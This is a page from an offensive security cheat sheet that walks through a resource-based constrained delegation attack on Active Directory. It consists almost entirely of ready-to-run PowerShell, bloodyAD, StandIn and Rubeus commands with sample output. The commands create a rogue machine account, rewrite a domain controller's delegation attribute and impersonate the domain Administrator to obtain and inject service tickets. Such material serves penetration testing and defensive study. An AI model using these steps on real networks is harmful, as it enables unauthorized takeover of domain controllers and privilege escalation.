InternalAllTheThings/docs/active-directory/kerberos-delegation-rbcd.md

Kerberos Delegation - Resource Based Constrained Delegation

Resource-based Constrained Delegation was introduced in Windows Server 2012.

The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

1. Import Powermad and Powerview

   PowerShell.exe -ExecutionPolicy Bypass
   Import-Module .\powermad.ps1
   Import-Module .\powerview.ps1
   

2. Get user SID

   $AttackerSID = Get-DomainUser SvcJoinComputerToDom -Properties objectsid | Select -Expand objectsid
   $ACE = Get-DomainObjectACL dc01-ww2.factory.lan | ?{$_.SecurityIdentifier -match $AttackerSID}
   $ACE
   ConvertFrom-SID $ACE.SecurityIdentifier
   
   # alternative (Windows/Linux)
   bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get writable --otype COMPUTER --detail | egrep -i 'distinguishedName|msds-allowedtoactonbehalfofotheridentity'
   

3. Abuse MachineAccountQuota to create a computer account and set an SPN for it

   New-MachineAccount -MachineAccount swktest -Password $(ConvertTo-SecureString 'Weakest123*' -AsPlainText -Force)
   
   # alternative (Windows/Linux)
   bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add computer swktest 'Weakest123*'
   

4. Rewrite DC's AllowedToActOnBehalfOfOtherIdentity properties

   $ComputerSid = Get-DomainComputer swktest -Properties objectsid | Select -Expand objectsid
   $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
   $SDBytes = New-Object byte[] ($SD.BinaryLength)
   $SD.GetBinaryForm($SDBytes, 0)
   Get-DomainComputer dc01-ww2.factory.lan | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
   $RawBytes = Get-DomainComputer dc01-ww2.factory.lan -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
   $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
   $Descriptor.DiscretionaryAcl
   
   # alternative (Windows/Linux)
   # use 'remove' instead of 'add' after exploit
   bloodyAD --host 10.1.0.4 -u user -p 'totoTOTOtoto1234*' -d crash.lab add rbcd 'dc01-ww2$' 'swktest$'
   

   # alternative
   $SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid
   $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
   
   # alternative
   StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND
   

5. Use Rubeus to get hash from password

   Rubeus.exe hash /password:'Weakest123*' /user:swktest$  /domain:factory.lan
   [*] Input password             : Weakest123*
   [*] Input username             : swktest$
   [*] Input domain               : factory.lan
   [*] Salt                       : FACTORY.LANswktest
   [*]       rc4_hmac             : F8E064CA98539B735600714A1F1907DD
   [*]       aes128_cts_hmac_sha1 : D45DEADECB703CFE3774F2AA20DB9498
   [*]       aes256_cts_hmac_sha1 : 0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347
   [*]       des_cbc_md5          : BA297CFD07E62A5E
   

6. Impersonate domain admin using our newly created machine account

   .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
   .\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
   
   [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan'
   [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5)
   [*] Building S4U2proxy request for service: 'cifs/dc01-ww2.factory.lan'
   [*] Sending S4U2proxy request
   [+] S4U2proxy success!
   [*] base64(ticket.kirbi) for SPN 'cifs/dc01-ww2.factory.lan':
   
       doIGXDCCBligAwIBBaEDAgEWooIFXDCCBVhhggVUMIIFUKADAgEFoQ0bC0ZBQ1RPUlkuTEFOoicwJaAD
       AgECoR4wHBsEY2lmcxsUZGMwMS[...]PMIIFC6ADAgESoQMCAQOiggT9BIIE
       LmZhY3RvcnkubGFu
   
   [*] Action: Import Ticket
   [+] Ticket successfully imported!
   

References

• Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami
• A Case Study in Wagging the Dog: Computer Takeover - Will Schroeder - Feb 28, 2019